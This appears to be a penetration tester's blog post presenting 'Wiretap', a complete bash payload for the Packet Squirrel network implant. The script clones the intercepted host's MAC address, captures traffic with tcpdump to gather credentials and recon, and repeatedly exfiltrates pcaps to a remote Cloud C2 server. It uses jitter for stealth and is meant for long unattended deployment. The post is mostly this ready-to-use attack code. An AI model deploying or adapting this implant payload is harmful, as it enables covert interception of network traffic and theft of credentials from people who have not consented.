The Packet Squirrel is a great network implant that can be used for a variety of purposes. One of the most common uses is to sniff network traffic to pcap. This is a great way to gather credentials, identify hosts, domain controllers and protocols in use, and perform lots of other network reconnaissance and packet analysis. However, the default tcpdump payload requires manual retrieval of the implanted Packet Squirrel from the target site to recover the pcaps.
This is obviously not ideal during a physical penetration test, as you must re-enter the site to recover the device, which makes it rather useless as a long-haul implant. To solve this problem I wrote a payload that automatically exfiltrates a set number of pcap files to Cloud C2 at a given interval. After each round of exfiltration the pcaps are archived, compressed, saved to USB and rotated. This allows the Packet Squirrel to be deployed and left on site for long periods of time without the need to re-enter the site to recover the device.
All you need to do is set the sleep interval and the number of pcaps to exfiltrate, modify the default jitter values if you prefer something shorter, and copy the payload to the switch1 folder; the device will do the rest. The NETMODE has also been set to CLONE, which clones the MAC address of the MITM’d host from the ethernet in (eth0) port and spoofs it on the ethernet out (eth1) port.
Pseudo-code flow diagram (figure)
payload.sh
#!/bin/bash
#
# Title: Wiretap
# Description: Sets the NETMODE to CLONE for opsec, sniffs traffic,
# and exfiltrates a set number of PCAPs to Cloud C2 at a given interval.
# PCAPs are archived and rotated after each round of exfiltration.
# Author: Shain Lakin
# Version: 1.0
# Category: sniffing, exfiltration
# Target: Any
# Net Mode: CLONE
# LED loop: LEDs are off by default, uncomment for debugging
#   Solid Yellow;     tcpdump running
#   Flashing Magenta; exfiltrating pcap
#   Flashing Red;     killing tcpdump
#   White Solid;      archiving pcaps and sleeping

# Seconds to sleep between rounds of exfiltration (jitter is added on top)
interval=3600
# Number of pcap files to exfiltrate before archiving and sleeping
num_exfils=100
# Clone the MAC address of the host on eth0 onto eth1
mode=CLONE
# Random 30 s to 10 min jitter added to the interval (picked once at start)
jitter=$((30 + RANDOM % 600))

# Archive the current round of pcaps, clear the capture directory,
# then sleep for the interval plus jitter. $1 is the base pcap name.
function rotate() {
    #LED W SOLID
    mkdir -p /mnt/loot/archive &>/dev/null
    tar -czf "/mnt/loot/archive/archive-$1.tar.gz" \
        /mnt/loot/tcpdump/ &>/dev/null
    rm -f /mnt/loot/tcpdump/dump*
    sleep $((interval + jitter))
}

# Stop tcpdump ($1 is its PID) and flush pending writes to the USB drive
function finish() {
    #LED R FAST
    kill "$1"
    wait "$1"
    sync
    sleep 1
}

# Size in bytes of file $1, or 0 if it does not exist yet
function fsize() {
    local s
    s=$(ls -l "$1" 2>/dev/null | awk '{print $5}')
    echo "${s:-0}"
}

# Capture on eth0 and exfiltrate each rotated pcap as it completes.
# tcpdump -C 2 rotates at 2,000,000 bytes: the first file is $fname,
# the following ones are ${fname}1, ${fname}2, ...
function sniff() {
    while true; do
        fname=dump_$(date +%Y-%m-%d-%H-%M).pcap
        mkdir -p /mnt/loot/tcpdump &>/dev/null
        tcpdump -i eth0 -w "/mnt/loot/tcpdump/$fname" -C 2 -z sync &>/dev/null &
        tpid=$!
        sleep 5
        c=0
        while true; do
            #LED ATTACK
            LED OFF
            # Path of the file tcpdump is currently writing
            cur="/mnt/loot/tcpdump/$fname"
            [[ $c -gt 0 ]] && cur="$cur$c"
            # Wait until it reaches the rotation size
            while [[ $(fsize "$cur") -lt 2000000 ]]; do sleep 1; done
            sync
            # Give tcpdump time to rotate, with a little jitter
            if [[ $c -eq 0 ]]; then
                sleep $((10 + RANDOM % 30))
            else
                sleep $((5 + RANDOM % 10))
            fi
            #LED M SUCCESS
            C2EXFIL "$cur"
            ((c++))
            # After num_exfils files: stop the capture, archive, sleep,
            # then start a fresh capture. A loop is used instead of
            # calling sniff recursively so the call stack does not grow
            # over a long deployment.
            if [[ $c -eq $num_exfils ]]; then
                finish "$tpid"
                rotate "$fname"
                break
            fi
        done
    done
}

# Only run once the USB loot drive is mounted
[[ ! -f /mnt/NO_MOUNT ]] && {
    NETMODE $mode
    sleep 30
    C2CONNECT
    sniff
} || {
    LED FAIL
}